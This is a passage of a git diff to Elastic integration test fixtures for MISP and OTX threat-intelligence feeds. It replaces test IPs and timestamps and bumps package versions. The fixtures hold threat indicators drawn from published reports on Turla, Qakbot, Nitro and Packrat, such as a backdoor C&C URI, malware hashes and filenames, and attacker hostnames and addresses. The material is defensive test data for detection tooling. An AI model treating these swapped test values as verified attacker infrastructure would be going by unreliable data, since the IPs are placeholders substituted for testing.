activity\",\"to_ids\":true,\"uuid\":\"54324081-3308-4f1f-8674-4953950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579457\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"89.160.20.156\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -446,7 +446,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046355205Z", + "ingested": "2021-12-09T13:49:05.849341900Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1086\",\"type\":\"hostname\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"543240dc-f068-437a-baa9-48f2950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579548\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"xenserver.ddns.net\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -518,7 +518,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046359252Z", + "ingested": "2021-12-09T13:49:05.849345900Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1089\",\"type\":\"text\",\"category\":\"External analysis\",\"to_ids\":false,\"uuid\":\"543240f9-64e8-41f2-958f-4e21950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579577\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"Nitro\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -594,7 +594,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046363170Z", + "ingested": "2021-12-09T13:49:05.849350400Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1090\",\"type\":\"sha1\",\"category\":\"External analysis\",\"to_ids\":true,\"uuid\":\"56c625a7-f31c-460c-9ea1-c652950d210f\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1455826343\",\"comment\":\"Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"0ea76f1586c008932d90c991dfdd5042f3aac8ea\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": 
"threat", "type": "indicator", @@ -668,7 +668,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046380382Z", + "ingested": "2021-12-09T13:49:05.849355800Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"12394\",\"type\":\"domain\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"572b4ab3-1af0-4d91-9cd5-07a1c0a8ab16\",\"event_id\":\"22\",\"distribution\":\"5\",\"timestamp\":\"1462454963\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"whatsapp.com\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -747,7 +747,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046389619Z", + "ingested": "2021-12-09T13:49:05.849361200Z", "original": "{\"Event\":{\"id\":\"158\",\"orgc_id\":\"5\",\"org_id\":\"1\",\"date\":\"2018-01-08\",\"threat_level_id\":\"1\",\"info\":\"Turla: Mosquito Whitepaper\",\"published\":true,\"uuid\":\"5a5395d1-40a0-45fc-b692-334a0a016219\",\"attribute_count\":\"61\",\"analysis\":\"0\",\"timestamp\":\"1535462417\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637953\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"local\":false},\"Attribute\":{\"id\":\"17299\",\"type\":\"url\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5a53976c-e7c8-480d-a68a-2fc50a016219\",\"event_id\":\"158\",\"distribution\":\"5\",\"timestamp\":\"1515427692\",\"comment\":\"Fake adobe URL\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"http://get.adobe.com/stats/AbfFcBebD/?q=\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[{\"Event\":{\"id\":\"58\",\"date\":\"2018-08-17\",\"threat_level_id\":\"1\",\"info\":\"Turla Outlook White Paper\",\"published\":true,\"uuid\":\"5b773e07-e694-458b-b99c-27f30a016219\",\"analysis\":\"0\",\"timestamp\":\"1535462383\",\"distribution\":\"3\",\"org_id\":\"1\",\"orgc_id\":\"5\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\"},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\"}}}],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"7\",\"name\":\"misp-galaxy:threat-actor=\\\"Turla 
Group\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"70\",\"name\":\"Turla\",\"colour\":\"#f20f53\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -819,7 +819,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046395060Z", + "ingested": "2021-12-09T13:49:05.849366500Z", "original": "{\"Event\":{\"id\":\"158\",\"orgc_id\":\"5\",\"org_id\":\"1\",\"date\":\"2018-01-08\",\"threat_level_id\":\"1\",\"info\":\"Turla: Mosquito Whitepaper\",\"published\":true,\"uuid\":\"5a5395d1-40a0-45fc-b692-334a0a016219\",\"attribute_count\":\"61\",\"analysis\":\"0\",\"timestamp\":\"1535462417\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637953\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"local\":false},\"Attribute\":{\"id\":\"17330\",\"type\":\"uri\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5a539ce1-3de0-4e34-8fc4-2fc50a016219\",\"event_id\":\"158\",\"distribution\":\"5\",\"timestamp\":\"1515429089\",\"comment\":\"Win32 backdoor C\u0026C URI\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"/scripts/m/query.php?id=\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[{\"Event\":{\"id\":\"58\",\"date\":\"2018-08-17\",\"threat_level_id\":\"1\",\"info\":\"Turla Outlook White Paper\",\"published\":true,\"uuid\":\"5b773e07-e694-458b-b99c-27f30a016219\",\"analysis\":\"0\",\"timestamp\":\"1535462383\",\"distribution\":\"3\",\"org_id\":\"1\",\"orgc_id\":\"5\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\"},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\"}}}],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"7\",\"name\":\"misp-galaxy:threat-actor=\\\"Turla 
Group\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"70\",\"name\":\"Turla\",\"colour\":\"#f20f53\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -897,7 +897,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046399799Z", + "ingested": "2021-12-09T13:49:05.849372600Z", "original": "{\"Event\":{\"id\":\"158\",\"orgc_id\":\"5\",\"org_id\":\"1\",\"date\":\"2018-01-08\",\"threat_level_id\":\"1\",\"info\":\"Turla: Mosquito Whitepaper\",\"published\":true,\"uuid\":\"5a5395d1-40a0-45fc-b692-334a0a016219\",\"attribute_count\":\"61\",\"analysis\":\"0\",\"timestamp\":\"1535462417\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637953\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"local\":false},\"Attribute\":{\"id\":\"17322\",\"type\":\"filename|sha1\",\"category\":\"Artifacts dropped\",\"to_ids\":false,\"uuid\":\"5a539ce1-e6a0-426a-942c-2fc50a016219\",\"event_id\":\"158\",\"distribution\":\"5\",\"timestamp\":\"1515429089\",\"comment\":\"JavaScript backdoor\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[{\"Event\":{\"id\":\"58\",\"date\":\"2018-08-17\",\"threat_level_id\":\"1\",\"info\":\"Turla Outlook White 
Paper\",\"published\":true,\"uuid\":\"5b773e07-e694-458b-b99c-27f30a016219\",\"analysis\":\"0\",\"timestamp\":\"1535462383\",\"distribution\":\"3\",\"org_id\":\"1\",\"orgc_id\":\"5\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\"},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\"}}}],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"7\",\"name\":\"misp-galaxy:threat-actor=\\\"Turla Group\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"70\",\"name\":\"Turla\",\"colour\":\"#f20f53\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -972,7 +972,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046404297Z", + "ingested": "2021-12-09T13:49:05.849378Z", "original": "{\"Event\":{\"id\":\"22\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2015-12-08\",\"threat_level_id\":\"3\",\"info\":\"Packrat: Seven Years of a South American Threat Actor\",\"published\":true,\"uuid\":\"56ccdcaf-f7e4-40d8-bca1-51299062e56a\",\"attribute_count\":\"133\",\"analysis\":\"2\",\"timestamp\":\"1516723796\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637901\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"12268\",\"type\":\"email-src\",\"category\":\"Payload delivery\",\"to_ids\":true,\"uuid\":\"56ccdcb6-4d6c-4e48-b955-52849062e56a\",\"event_id\":\"22\",\"distribution\":\"5\",\"timestamp\":\"1456266422\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"claudiobonadio88@gmail.com\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -1045,7 +1045,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046408445Z", + "ingested": "2021-12-09T13:49:05.849383300Z", "original": "{\"Event\":{\"id\":\"22\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2015-12-08\",\"threat_level_id\":\"3\",\"info\":\"Packrat: Seven Years of a South American Threat Actor\",\"published\":true,\"uuid\":\"56ccdcaf-f7e4-40d8-bca1-51299062e56a\",\"attribute_count\":\"133\",\"analysis\":\"2\",\"timestamp\":\"1516723796\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637901\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"12298\",\"type\":\"regkey\",\"category\":\"Artifacts dropped\",\"to_ids\":true,\"uuid\":\"56ccdcd6-f4b8-4383-9624-52849062e56a\",\"event_id\":\"22\",\"distribution\":\"5\",\"timestamp\":\"1456266454\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -1109,7 +1109,7 @@ "type": "ipv4-addr", "provider": "misp", "port": 2222, - "ip": "62.38.114.12", + "ip": "89.160.20.156", "scanner_stats": 2 }, "feed": { 
@@ -1117,8 +1117,8 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046412382Z", - "original": "{\"Event\":{\"id\":\"10\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2020-12-09\",\"threat_level_id\":\"3\",\"info\":\"Recent Qakbot (Qbot) activity\",\"published\":true,\"uuid\":\"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16\",\"attribute_count\":\"15\",\"analysis\":\"2\",\"timestamp\":\"1607868196\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637888\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"10686\",\"type\":\"ip-dst|port\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"5fd0c620-a844-4ace-9710-a37bc0a8ab16\",\"event_id\":\"10\",\"distribution\":\"5\",\"timestamp\":\"1607517728\",\"comment\":\"On port 2222\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"62.38.114.12|2222\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"6\",\"name\":\"misp-galaxy:banker=\\\"Qakbot\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0}]}}", + "ingested": "2021-12-09T13:49:05.849388700Z", + "original": 
"{\"Event\":{\"id\":\"10\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2020-12-09\",\"threat_level_id\":\"3\",\"info\":\"Recent Qakbot (Qbot) activity\",\"published\":true,\"uuid\":\"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16\",\"attribute_count\":\"15\",\"analysis\":\"2\",\"timestamp\":\"1607868196\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637888\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"10686\",\"type\":\"ip-dst|port\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"5fd0c620-a844-4ace-9710-a37bc0a8ab16\",\"event_id\":\"10\",\"distribution\":\"5\",\"timestamp\":\"1607517728\",\"comment\":\"On port 2222\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"89.160.20.156|2222\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"6\",\"name\":\"misp-galaxy:banker=\\\"Qakbot\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_misp/manifest.yml b/packages/ti_misp/manifest.yml index 6e724853b74..3472abcabf3 100644 --- a/packages/ti_misp/manifest.yml +++ b/packages/ti_misp/manifest.yml 
@@ -1,6 +1,6 @@
 name: ti_misp
 title: MISP
-version: 1.0.1
+version: 1.0.2
 release: ga
 description: This Elastic integration collects events from MISP
 type: integration
diff --git a/packages/ti_otx/changelog.yml b/packages/ti_otx/changelog.yml
index fe202fe50a1..c97e966f2e8 100644
--- a/packages/ti_otx/changelog.yml
+++ b/packages/ti_otx/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.0.3"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.0.2"
 changes:
 - description: Bump minimum version
diff --git a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log
index 22ed47e12f4..7a78647e7f9 100644
--- a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log
+++ b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log
@@ -1,12 +1,12 @@
-{"indicator":"86.104.194.30","description":null,"title":null,"content":"","type":"IPv4","id":1588938}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1588938}
 {"indicator":"90421f8531f963d81cf54245b72cde80","description":"MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65","title":"Win32:Hoblig-B","content":"","type":"FileHash-MD5","id":9751110}
 {"indicator":"ip.anysrc.net","description":null,"title":null,"content":"","type":"hostname","id":16782717}
-{"indicator":"107.173.58.176","description":null,"title":null,"content":"","type":"IPv4","id":19901748}
